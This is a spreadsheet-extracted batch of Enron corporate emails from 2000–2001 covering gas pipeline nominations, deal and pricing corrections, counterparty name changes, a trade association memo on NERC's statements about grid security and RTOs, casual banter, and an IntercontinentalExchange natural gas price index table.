Government commit to allowing emmission constrainted generators to buy=20_x000D_
emission credits_x000D_
Goverment change legislation to allow swift DSM activity_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 Aug 2000 01:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.dobler@enron.com'})</t>
  </si>
  <si>
    <t>Mark, go ahead and set up the meeting._x000D_
_x000D_
Delainey</t>
  </si>
  <si>
    <t>Sun, 3 Jun 2001 06:30:35 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Company: 002909     Arng: 39229-09137     Eff Date: 2001-06-04_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                         0                    62_x000D_
Working                           0                    62_x000D_
Capacity Allocation               0                    62_x000D_
Confirmed                         0                    24  CBL_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-09253     Eff Date: 2001-06-04_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                         0                 4,739_x000D_
Working                           0                 4,739_x000D_
Capacity Allocation               0                 4,739_x000D_
Confirmed                         0                 4,735  CBL_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10166     Eff Date: 2001-06-04_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                     5,256                     0_x000D_
Working                       5,256                     0_x000D_
Capacity Allocation           5,256                     0_x000D_
Confirmed                         0  CBL                0_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10167     Eff Date: 2001-06-04_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                     4,054                     0_x000D_
Working                       4,054                     0_x000D_
Capacity Allocation           4,054                     0_x000D_
Confirmed                         0  CBL                0_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10168     Eff Date: 2001-06-04_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                     5,000                     0_x000D_
Working                       5,000                     0_x000D_
Capacity Allocation           5,000                     0_x000D_
Confirmed                         0  CBL                0_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10169     Eff Date: 2001-06-04_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                     2,500                     0_x000D_
Working                       2,500                     0_x000D_
Capacity Allocation           2,500                     0_x000D_
Confirmed                         0  CBL                0_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10171     Eff Date: 2001-06-04_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                    10,000                     0_x000D_
Working                      10,000                     0_x000D_
Capacity Allocation          10,000                     0_x000D_
Confirmed                         1  CBL                0_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10172     Eff Date: 2001-06-04_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                    32,060                     0_x000D_
Working                      32,060                     0_x000D_
Capacity Allocation          32,060                     0_x000D_
Confirmed                    29,945  CBL                0_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10173     Eff Date: 2001-06-04_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                    11,138                     0_x000D_
Working                      11,138                     0_x000D_
Capacity Allocation          11,138                     0_x000D_
Confirmed                    10,404  CBL                0_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10174     Eff Date: 2001-06-04_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                     1,476                     0_x000D_
Working                       1,476                     0_x000D_
Capacity Allocation           1,476                     0_x000D_
Confirmed                     1,379  CBL                0_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10175     Eff Date: 2001-06-04_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                     1,636                     0_x000D_
Working                       1,636                     0_x000D_
Capacity Allocation           1,636                     0_x000D_
Confirmed                     1,528  CBL                0_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10190     Eff Date: 2001-06-04_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                    12,000                     0_x000D_
Working                      12,000                     0_x000D_
Capacity Allocation          12,000                     0_x000D_
Confirmed                    11,209  CBL                0_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10230     Eff Date: 2001-06-04_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                         0                   274_x000D_
Working                           0                   274_x000D_
Capacity Allocation               0                   274_x000D_
Confirmed                         0                     0  CBL_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10261     Eff Date: 2001-06-04_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                         0                 1,100_x000D_
Working                           0                 1,100_x000D_
Capacity Allocation               0                 1,100_x000D_
Confirmed                         0                     0  CBL_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10281     Eff Date: 2001-06-04_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                     7,530                     0_x000D_
Working                       7,530                     0_x000D_
Capacity Allocation           7,530                     0_x000D_
Confirmed                     7,034  CBL                0_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10282     Eff Date: 2001-06-04_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                    10,000                     0_x000D_
Working                      10,000                     0_x000D_
Capacity Allocation          10,000                     0_x000D_
Confirmed                     9,341  CBL                0_x000D_
_x000D_
_x000D_
Company: 002909     Arng: 39229-10291     Eff Date: 2001-06-04_x000D_
_x000D_
                        ----- Receipt -----   ----- Delivery -----_x000D_
                           Quantity  Cut CD      Quantity  Cut CD_x000D_
_x000D_
Nominated                       600                     0_x000D_
Working                         600                     0_x000D_
Capacity Allocation             600                     0_x000D_
Confirmed                       300  CBL                0_x000D_
</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 08:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'joan.quick@enron.com', 'susan.smith@enron.com', 'marilyn.colbert@enron.com', 'michael.morris@enron.com', 'sylvia.campos@enron.com', 'faye.ellis@enron.com', 'genia.fitzgerald@enron.com', 'kelly.lombardi@enron.com', 'patrice.mims@enron.com', 'brad.coleman@enron.com', 'kelly.carrington@enron.com', 'sylvia.pollan@enron.com', 'connie.sutton@enron.com', 'steve.watson@enron.com', 'lisa.carver@enron.com', 'elizabeth.hernandez@enron.com', 'larry.hunter@enron.com', 'edward.terry@enron.com', 'dianne.seib@enron.com', 'melissa.graves@enron.com', 'christa.winfrey@enron.com', 'kenneth.harmon@enron.com', 'bryce.baxter@enron.com', 'shonnie.daniel@enron.com', 'stephanie.panus@enron.com', 'jeff.richter@enron.com', 'lane.alexander@enron.com', 'anita.patton@enron.com', 'elsa.villarreal@enron.com', 'colleen.sullivan@enron.com', 'anthony.campos@enron.com', 'vance.taylor@enron.com', 'bill.hare@enron.com', 'irene.flynn@enron.com', 'jason.moore@enron.com', 'victor.lamadrid@enron.com', 'debbie.brackett@enron.com', 'amelia.alland@enron.com', 'errol.mclaughlin@enron.com', 'mark.thorne@enron.com', 'richard.miley@enron.com', 'samuel.schott@enron.com', 'mary.smith@enron.com', 'laura.vargas@enron.com', 'oscar.rivera@enron.com', 'lisa.cousino@enron.com', 'kimberlee.bennick@enron.com', 'donald.reinhardt@enron.com', 'boyd.coble@enron.com', 'brenda.herod@enron.com', 'scotty.gilbert@enron.com', 'clem.cernosek@enron.com', 'cregg.lancaster@enron.com', 'jennifer.oliver@enron.com', 'john.powell@enron.com', 'bernice.rodriguez@enron.com', 'product.houston@enron.com', 'susan.elledge@enron.com', 'kate.symes@enron.com', 'james.scribner@enron.com', 'ellen.wallumrod@enron.com', 'kathryn.bussell@enron.com', 'peggy.hedstrom@enron.com', 'andrew.lewis@enron.com', 'richard.mckeel@enron.com', 'chris.mallory@enron.com', 'edward.baughman@enron.com', 'daren.farmer@enron.com', 'geoff.storey@enron.com', 'lauri.allen@enron.com', 'shemeika.landry@enron.com', 'kim.theriot@enron.com', 'russell.diamond@enron.com', 'nanette.kettler@enron.com', 'jefferson.sorenson@enron.com', 'bridgette.anderson@enron.com', 'rahil.jafry@enron.com', 'tammie.huthmacher@enron.com', 'lisa.valderrama@enron.com', "romeo.d'souza@enron.com", 'sanjeev.gupta@enron.com', 'scott.lytle@enron.com', 'cheryl.dawes@enron.com', 'carrie.southard@enron.com', 'marilyn.schoppe@enron.com', 'gary.lamphier@enron.com', 'enron.facilities@enron.com', 'walter.guidroz@enron.com', 'willie.stewart@enron.com', 'scott.mills@enron.com', 'john.nowlan@enron.com', 'shawna.flynn@enron.com', 'veronica.espinoza@enron.com', 'marlene.hilliard@enron.com', 'karen.lambert@enron.com', 'george.weissman@enron.com', 'kori.loibl@enron.com', 'ralph.douglas@enron.com', 'lisa.gillette@enron.com', 'sony.wilson@enron.com', 'richard.pinion@enron.com', 'enron.counterparty@enron.com', 'mike.croucher@enron.com', 'tom.moore@enron.com', 'carlos.rodriguez@enron.com', 'cheryl.dudley@enron.com', 'rhonda.denton@enron.com', 'stacey.white@enron.com', 'linda.bryan@enron.com', 'claire.viejou@enron.com', 'hoong.foon@enron.com', 'andrea.guillen@enron.com', 'sherry.dawson@enron.com', 'jim.little@enron.com', 'glenda.mitchell@enron.com', 'stacy.dickson@enron.com', 'elsie.lew@enron.com', 'julie.meyers@enron.com', 'carolyn.gilley@enron.com', 'robert.cotten@enron.com', 'randall.gay@enron.com', 'jenny.latham@enron.com', 'cary.carrabine@enron.com', 'phillip.platter@enron.com', 'nathan.hlavaty@enron.com', 'debra.perlingiere@enron.com', 'katherine.kelly@enron.com', 'monica.lande@enron.com', 'amita.gosalia@enron.com', 'philippe.travis@enron.com', 'karin.williams@enron.com', 'michael.eiben@enron.com', 'colette.weinreich@enron.com', 'liz.hillman@enron.com', 'hillary.mack@enron.com', 'tracy.ngo@enron.com', 'd.hall@enron.com', 'jeremy.morris@enron.com', 'anne.bike@enron.com', 'veronica.thompson@enron.com', 'nidia.mendoza@enron.com', 'brad.schneider@enron.com', 'dale.newberger@enron.com', 'b.palmer@enron.com', 'david.hardy@enron.com', 'susan.trevino@enron.com', 'matilda.machado@enron.com', 'jeremy.wong@enron.com', 'sam.round@enron.com', 'diane.ellstrom@enron.com', 'regina.perkins@enron.com', 'jim.homco@enron.com', 'laurel.adams@enron.com', 'brant.reves@enron.com', 'suzy.robey@enron.com', 'john.swinney@enron.com', 'sharon.gonzales@enron.com', 'michelle.laurant@enron.com', 'rita.wynne@enron.com', 'michele.small@enron.com', 'donna.consemiu@enron.com', 'arfan.aziz@enron.com', 'bruce.mills@enron.com', 'pat.clynes@enron.com', 'cindy.horn@enron.com', 'georgia.blanchard@enron.com', 'spencer.teel@enron.com', 'cathy.harris@enron.com', 'cyndie.balfour-flanagan@enron.com', 'carla.hoffman@enron.com', 'troy.klussmann@enron.com', 'lynn.shivers@enron.com', 'tana.jones@enron.com', 'debbie.nicholls@enron.com', 'stacey.richardson@enron.com', 'frank.ortiz@enron.com', 'winston.goodbody@enron.com', "o'neal.winfree@enron.com", 'jennifer.blay@enron.com', 'leslie.reeves@enron.com', 'bob.bowen@enron.com', 'bob.hall@enron.com'})</t>
  </si>
  <si>
    <t>Name Overlay 0419</t>
  </si>
  <si>
    <t>Attached please find a name change for Western Area Power Administration's _x000D_
Phoenix Area Office.  This is a branch office for the US Department of _x000D_
Energy.  There is no documentation for this change._x000D_
_x000D_
Shortname changes will be coordinated with ERMS IT tomorrow, 04/20/01._x000D_
_x000D_
Records will be inactivated on Tue, May 1._x000D_
_x000D_
_x000D_
_x000D_
Please call with any questions or concerns._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Cheryl x33103</t>
  </si>
  <si>
    <t>Fri, 10 Nov 2000 03:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Canadian Prepay</t>
  </si>
  <si>
    <t>Rick Borden at Macleod Dixon sent us a fax requesing copies of the documents _x000D_
on the prepay.  Can you send him a copy?  Also, when they're all together, _x000D_
can you send a copy to me for our files.  Thanks!</t>
  </si>
  <si>
    <t>Mon, 12 Jun 2000 00:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>market structure meeting</t>
  </si>
  <si>
    <t>steve walton in town for the northwest rto</t>
  </si>
  <si>
    <t>Fri, 22 Dec 2000 04:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: New Calpine wksht</t>
  </si>
  <si>
    <t>Thanks,  there are no other changes to the credit terms?  The threshold _x000D_
remains as is??_x000D_
_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Wed, 3 Oct 2001 13:01:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: NERC Statements on Impact of Security Threats on RTOs</t>
  </si>
  <si>
    <t xml:space="preserve">Rick --_x000D_
_x000D_
You indicated that NERC disavowed their discussions with the press about national security and RTOs to NB (I may have misheard you).  I think these attachments would prove otherwise.  Finally, I'm sure that RJ Rudden is just fronting for Southern._x000D_
_x000D_
Jim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Michael Reddy" &lt;Mreddy@epsa.org&gt;@ENRON [mailto:IMCEANOTES-+22Michael+20Reddy+22+20+3CMreddy+40epsa+2Eorg+3E+40ENRON@ENRON.com] _x000D_
Sent:	Tuesday, September 25, 2001 4:09 PM_x000D_
To:	acomnes@enron.com; Hawkins, Bernadette; Nersesian, Carin; Yeung, Charles; Nicolay, Christi L.; Fulton, Donna; Scheuer, Janelle; Hartsoe, Joe; Shelk, John; Jsteffe@enron.com; Noske, Linda J.; Robertson, Linda; Alvarez, Ray; Shapiro, Richard; Novosel, Sarah; Mara, Susan; Lindberg, Susan; Hoatson, Tom_x000D_
Subject:	NERC Statements on Impact of Security Threats on RTOs_x000D_
_x000D_
MEMORANDUM_x000D_
_x000D_
TO: Legislative Affairs Committee_x000D_
       Regulatory Affairs Committee_x000D_
       NAERO Working Group_x000D_
_x000D_
FROM: Scott Weiner, Legislative Affairs Committee Chair_x000D_
             Jim Steffes, Regulatory Affairs Committee Chair_x000D_
             Mark Bennett, Senior Manager of Policy_x000D_
             Donn Salvosa, Manager of Government Affairs_x000D_
_x000D_
DATE: September 25, 2001_x000D_
_x000D_
RE: NERC Statements on Impact of Security Threats on RTOs_x000D_
_x000D_
The attached e-mail in Microsoft Word form contains statements that NERC made during a recent meeting with members of the national press.  The statements concern NERC's view of the implications of terrorist threats for FERC's " Four RTO policy" set forth in its July 12th Order.  The statements also may bear upon the effort to establish a new standards setting organization, particularly the possibility that NERC's responsibilities could be shifted to EISB.  Also attached is an article containing the views of R.J. Rudden Associates, Inc. that discusses the risks associated with centralizing control center operations._x000D_
_x000D_
Specifically, NERC representatives informed the press that on September 11 "the grid was the target of an insidious cyber attack that shut down some facilities...from an information administration standpoint."  They noted that this resulted in service denials, although it is not clear whether they indicated where or how much.  This event was attributed to the so-called "NIMBA virus"._x000D_
_x000D_
NERC's statements suggest a new strategy to preserve the role they've played not only in security matters, but possibly other aspects pertaining to "reliability standards."  They warn against any immediate transition to fewer RTOs as envisioned in FERC's July 12th Order.  Moreover, it is likely that NERC will argue that, given its expertise and experience, recent events make transitioning to a new standards organization (EISB?) ill advised._x000D_
_x000D_
It is unclear what, if any, impact all this may have on RTO development, the legislative effort to establish a new reliability standards body or the NERC Board's consideration of pending reform proposals at its October meeting.  However, we can expect security related issues to be included in future discussions of these matters._x000D_
_x000D_
Please provide your reactions to the NERC statements to Mark Bennett at 202-628-8200 or mbennett@epsa.org_x000D_
_x000D_
_x000D_
 - Mark.doc _x000D_
 - R.doc </t>
  </si>
  <si>
    <t>Tue, 18 Apr 2000 08:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Deal Tickets</t>
  </si>
  <si>
    <t xml:space="preserve">Mike no longer writes actual tickets.  Confirms can find the information in _x000D_
the following location:_x000D_
_x000D_
O:\_Dropbox\NYMEXDaysTrades\GDWest\BrokerTradeTickets\mmddyygdwest.xls_x000D_
_x000D_
All of Mike's tickets deals can be found in this same location on a daily _x000D_
basis._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Jennifer Blay                           04/18/2000 03:26 PM_x000D_
	_x000D_
_x000D_
To: Susan M Scott/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Deal Tickets_x000D_
_x000D_
Hey..._x000D_
_x000D_
I do not have deal tickets for deals NE8581 and NE8175.  These are from April _x000D_
13 and we want to send confirms ASAP._x000D_
_x000D_
Let me know _x000D_
Thanks a bunch!!!_x000D_
Jennifer_x000D_
5-7678_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 30 Jan 2001 06:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Tuberville</t>
  </si>
  <si>
    <t xml:space="preserve">i could give two shits about your rb recruit - we already have the best rb in _x000D_
the country in our class and goes by the name cedric_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Phillip M Love_x000D_
01/30/2001 02:12 PM_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Tuberville  _x000D_
_x000D_
Your just pissed because I was right about that recruit all along._x000D_
PL_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 9 Mar 2000 06:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.tawney@enron.com', 'steven.vu@enron.com', 'david.kistler@enron.com'})</t>
  </si>
  <si>
    <t>WeatherTrade, Inc.</t>
  </si>
  <si>
    <t>We have received the executed  Amendment to the Subscription Agreement with _x000D_
WeatherTrade, Inc. dated March 2, 2000.  This Amendment amends the _x000D_
Transaction Fee referenced in subparagraph (c) of the Fee Schedule to the _x000D_
Subscription Agreement.  Copies will be distributed.</t>
  </si>
  <si>
    <t>Mon, 28 Aug 2000 05:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Price corrections for 6/00 Production</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Darron C Giron/HOU/ECT on 08/28/2000 _x000D_
12:58 PM ---------------------------_x000D_
_x000D_
_x000D_
Jane S Saladino_x000D_
08/28/2000 11:49 AM_x000D_
To: Darron C Giron/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Price corrections for 6/00 Production  _x000D_
_x000D_
Darron, I believe you were ask about this last month.  it is still causing a _x000D_
pricing difference this month too.  Please call me so we can staighten out _x000D_
the deal or you can call Laura Scott in Canada and argue your point.  This is _x000D_
on open OA difference and will continue to be until you handle it._x000D_
_x000D_
_x000D_
_x000D_
Elizabeth L Hernandez_x000D_
07/21/2000 04:34 PM_x000D_
To: Phillip M Love/HOU/ECT@ECT, Shawna Johnson/Corp/Enron@ENRON_x000D_
cc: Jane S Saladino/HOU/ECT@ECT _x000D_
Subject: Price corrections for 6/00 Production_x000D_
_x000D_
I was able to change the first deal in Sitara, but the other pricing request _x000D_
I did not feel comfortable making any changes.  Would you please look at this _x000D_
pricing issue for Client Services since they need to get it paid on Monday._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Elizabeth L Hernandez/HOU/ECT on _x000D_
07/21/2000 04:31 PM ---------------------------_x000D_
_x000D_
_x000D_
Jane S Saladino_x000D_
07/21/2000 04:10 PM_x000D_
To: Elizabeth L Hernandez/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Price corrections for 6/00 Production_x000D_
_x000D_
Please correct the following deals:_x000D_
_x000D_
Enron Canada purchase deal # 121397  Was 4.18427 should be 4.10185  This is _x000D_
due to a Buy/back at Chippawa which reduces our Sithe transport by _x000D_
$70,191.70   I normally book this manually (with Journal entry) but with SAP, _x000D_
it needs to be in Unify and this is the only deal I can book it to.  The _x000D_
Sithe transport is in Canadian dollars and this reduction is in US $._x000D_
_x000D_
_x000D_
Also I have the following deals which are scheduled different on our side _x000D_
that Enron Canada and causes me about a $500 out of balance each month.  We _x000D_
have netted this with other out of balances in previous months but with SAP, _x000D_
I can no longer do this. Here is what happens:_x000D_
_x000D_
ENA Books:  Purchase Deal 290657  for 30,390  MMBTU per day at _x000D_
Michcon.Citygate.GD.M.I.-.005 = $4,125,442.50_x000D_
            Sale Deal 290652 for     ( 5,000) MMBTU per day at _x000D_
Michcon.Citygate.GD.M.I.-.0075=    678,375.00_x000D_
                                                                              _x000D_
  Total          $3,447,067.50_x000D_
                                                                        _x000D_
Enron Canada Books:_x000D_
_x000D_
            Sale                  for 20,000 MMBTU per day at _x000D_
Michcon.Citygate.GD.M.I.-.005=   $2,715,000.00_x000D_
  Sale                  for  5,390 MMBTU per day at _x000D_
Michcon.Citygate.GD.M.I.     =      732,501.00_x000D_
                                                                              _x000D_
  Total          $3,447,501.00_x000D_
_x000D_
I don't know why we book a purchase and sale but it messes up the deal in _x000D_
SAP.  Can we change the ENA sale deal 290652 to posting -.005 and the ENA _x000D_
purchase deal # 290657 tier it for 25,000 at Posting -.005 and balance at _x000D_
posting.  Let me know as soon as possible.  I need to pay this AM on Monday._x000D_
_x000D_
_x000D_
Thanks, Jane_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Jun 2000 09:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'alvin.thompson@enron.com', 'victoria.versen@enron.com', 'beverly.beaty@enron.com'})</t>
  </si>
  <si>
    <t>New Transport deal</t>
  </si>
  <si>
    <t>We are selling 20,000 day to Transco at TP #5564.  It will cost us $.0153 to _x000D_
go from St 65 to the Sims deal, no fuel.  The transport usage deal is 289228._x000D_
_x000D_
Let me know if you have any questions.</t>
  </si>
  <si>
    <t>Fri, 30 Nov 2001 10:00:06 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">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Saturday, December  01, 200=_x000D_
1 thru Monday, December  03, 2001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Trade Date of Friday, November  30, 200=_x000D_
1)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20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20_x000D_
Region     Hub=09High=09Low=09Wtd Avg Index=09Change ($)=09Vol (mmBtu)=09Hu=_x000D_
b Name=09_x000D_
 LOUISIANA =09=09=09=09=09=09=09_x000D_
    ANR SE=09          $2.1700=09          $1.4550=09          $1.6861=09- =_x000D_
   .4444=09         512,700=09American Natural Resources Pipeline Co. - SE =_x000D_
 Transmission Pool=09_x000D_
    Columbia Onshore=09          $2.2200=09          $1.3800=09          $1=_x000D_
.8182=09-    .3434=09         611,400=09Columbia Gulf Transmission Co. - On=_x000D_
shore Pool =09_x000D_
    Henry Hub=09          $2.2400=09          $1.4550=09          $1.7772=_x000D_
=09-    .4294=09       2,408,400=09Henry Hub tailgate - Louisiana =09_x000D_
    NGPL LA=09          $2.1850=09          $1.4450=09          $1.7880=09-=_x000D_
    .3628=09         857,400=09Natural Gas Pipeline Co. of America, Louisia=_x000D_
na Pool =09_x000D_
    Tenn 500L=09          $2.0500=09          $1.3600=09          $1.6897=_x000D_
=09-    .3909=09         439,200=09Tennessee Gas Pipeline Co.-Zone L, 500 L=_x000D_
eg Pool =09_x000D_
    Tenn 800L=09          $1.9600=09          $1.3600=09          $1.6404=_x000D_
=09-    .4569=09         642,600=09Tennessee Gas Pipeline Co.-Zone L, 800 L=_x000D_
eg Pool =09_x000D_
    TETCO ELA=09          $2.1200=09          $1.4050=09          $1.5377=_x000D_
=09-    .5804=09         758,400=09Texas Eastern - East LA =09_x000D_
    TETCO WLA=09          $2.1275=09          $1.4400=09          $1.6767=_x000D_
=09-    .4363=09         351,900=09Texas Eastern - West LA =09_x000D_
    Transco 65=09          $2.1500=09          $1.2625=09          $1.4422=_x000D_
=09-    .7026=09         667,200=09Transco - Station 65 =09_x000D_
    Trunkline ELA=09          $2.1200=09          $1.4600=09          $1.59=_x000D_
63=09-    .5699=09         304,200=09Trunkline Gas Company - East Louisiana=_x000D_
 Pool =09_x000D_
    TxGas SL=09          $2.2350=09          $1.4500=09          $1.8697=09=_x000D_
-    .2844=09         388,800=09Texas Gas Transmission Corp.-Zone SL FT Poo=_x000D_
l =09_x000D_
 MIDCONTINENT =09=09=09=09=09=09=09_x000D_
    MichCon, citygate=09          $2.1950=09          $1.6500=09          $=_x000D_
1.8548=09-    .5539=09         561,000=09Michigan Consolidated =09_x000D_
    NGPL Midcont=09          $2.0000=09          $1.3850=09          $1.676=_x000D_
9=09-    .5471=09         443,700=09Natural Gas Pipeline Co. of America, Mi=_x000D_
d-Continent Pool =09_x000D_
    NGPL Nicor, citygate=09          $2.2800=09          $1.5300=09        =_x000D_
  $1.8238=09-    .5164=09       1,996,200=09Natural Gas Pipeline Co. of Ame=_x000D_
rica, Nicor Citygate=09_x000D_
    NGPL NIPSCO, citygate=09          $2.2500=09          $1.5700=09       =_x000D_
   $1.9588=09-    .3889=09         203,700=09Natural Gas Pipeline Co. of Am=_x000D_
erica, Nipsco Citygate=09_x000D_
    NNG Demarcation=09          $2.2500=09          $1.5500=09          $1.=_x000D_
8897=09-    .4236=09         567,000=09Northern Natural Gas, Demarcation Po=_x000D_
ol =09_x000D_
 NORTHEAST =09=09=09=09=09=09=09_x000D_
    Columbia TCO=09          $2.3500=09          $1.5000=09          $1.959=_x000D_
8=09-    .3519=09         939,000=09Columbia Gas Co. - TCO Pool =09_x000D_
    Dominion So.Point=09          $2.1500=09          $1.4500=09          $=_x000D_
1.6484=09-    .5296=09         927,300=09Dominion - South Point =09_x000D_
    TETCO M3=09          $2.8000=09          $1.6400=09          $1.9320=09=_x000D_
-    .4320=09         766,500=09Texas Eastern - M3 Zone =09_x000D_
    Transco Z-6 (NY)=09          $2.5000=09          $1.7500=09          $2=_x000D_
.0432=09-    .5982=09         450,000=09Transcontinental Gas Pipe Line Corp=_x000D_
. - Zone 6 (NY)=09_x000D_
 WEST =09=09=09=09=09=09=09_x000D_
    El Paso non-Bondad=09          $1.9000=09          $1.4000=09          =_x000D_
$1.5980=09-    .7579=09         351,000=09El Paso - San Juan Basin, Blanco =_x000D_
Pool=09_x000D_
    Huntingdon/Sumas=09          $2.2000=09          $1.9000=09          $2=_x000D_
.0241=09-    .5807=09         363,600=09Westcoast Energy &amp; Northwest Pipeli=_x000D_
ne Corp.=09_x000D_
    Opal=09          $1.8500=09          $1.4500=09          $1.5756=09-   =_x000D_
 .5166=09         336,300=09Opal=09_x000D_
    PG?Citygate=09          $2.6600=09          $2.1200=09          $2.4220=_x000D_
=09-    .4127=09         375,000=09PG?- Citygate =09_x000D_
    SoCal Border=09          $2.6000=09          $1.9000=09          $2.148=_x000D_
2=09-    .4160=09         249,000=09Southern California Border Points (Ehre=_x000D_
nberg,Topock,Needles)=09_x000D_
 WEST TEXAS =09=09=09=09=09=09=09_x000D_
    El Paso - Keystone=09          $2.2000=09          $1.6000=09          =_x000D_
$1.8572=09-    .4949=09       1,046,700=09El Paso - Keystone Pool=09_x000D_
    Waha=09          $2.1200=09          $1.5900=09          $1.8637=09-   =_x000D_
 .4536=09       1,185,000=09Waha Hub - West Texas =09_x000D_
_x000D_
_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                   Includes all firm physical fixed price t=_x000D_
rades done from 7 AM to 11:30 AM Central Prevailing Time on the trade date =_x000D_
specified for natural gas delivered on the specified date(s).              =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
       =20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20_x000D_
This data is provided to you free of charge.  IntercontinentalExchange rese=_x000D_
rves the right to cancel this service at any time for any reason or no reas=_x000D_
on at all.                                                                 =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
               =20_x000D_
